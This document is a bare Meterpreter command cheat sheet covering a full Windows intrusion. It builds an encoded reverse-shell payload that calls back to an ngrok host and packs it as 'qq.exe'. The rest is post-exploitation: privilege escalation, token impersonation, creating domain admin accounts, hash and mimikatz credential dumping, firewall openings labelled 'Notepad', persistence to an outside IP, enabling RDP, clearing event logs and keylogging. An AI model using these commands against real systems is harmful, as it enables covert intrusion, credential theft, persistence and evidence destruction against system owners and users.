meterpreter Command Sample

meterpreter Command Sample

==================================================================================================
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b 'x00' LHOST=free.ngrok.cc LPORT=10678 -f c

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b 'x00' LHOST=free.ngrok.cc LPORT=10678 -f exe -o qq.exe
upx -5 qq.exe -k
==================================================================================================
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.195.45
set lport 10678
set ExitOnSession false
set AutorunScript post/windows/manage/smart_migrate
exploit -j -z
jobs

sessions -i 1
sysinfo
screenshot
getuid
getsystem
getuid
run post/windows/manage/priv_migrate
background

ps
steal_token PID
drop_token
getuid

use incognito
help incognito
list_tokens -u
list_tokens -g
impersonate_token DOMAIN_NAMEUSERNAME
add_user domainuser password -h 192.168.195.191
add_group_user "Domain Admins" domainuser -h 192.168.195.191

run post/windows/gather/smart_hashdump
# http://www.objectif-securite.ch/en/ophcrack.php

use mimikatz
help mimikatz
msv
ssp
kerberos
wdigest
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords

run post/windows/gather/checkvm
run post/windows/gather/enum_applications
run post/windows/gather/dumplinks

run post/windows/gather/usb_history
run post/windows/gather/enum_devices

execute -f cmd.exe -i -H -t
net user username userpass /add
net localgroup "Administrators" username /add
net user domainuser userpass /add /DOMAIN
net group "Domain Admins" domainuser /add /DOMAIN
netsh firewall add portopening TCP 10678 "Notepad" ENABLE ALL
netsh firewall add portopening TCP 19655 "Notepad" ENABLE ALL
exit

run metsvc
run persistence -X -i 10 -p 10678 -r 47.90.92.56

run post/windows/manage/enable_rdp
run getgui -e
run getgui -u username -p userpass
# rdesktop -u username -p userpass server[:port]

clearev
run post/windows/capture/keylog_recorder
==================================================================================================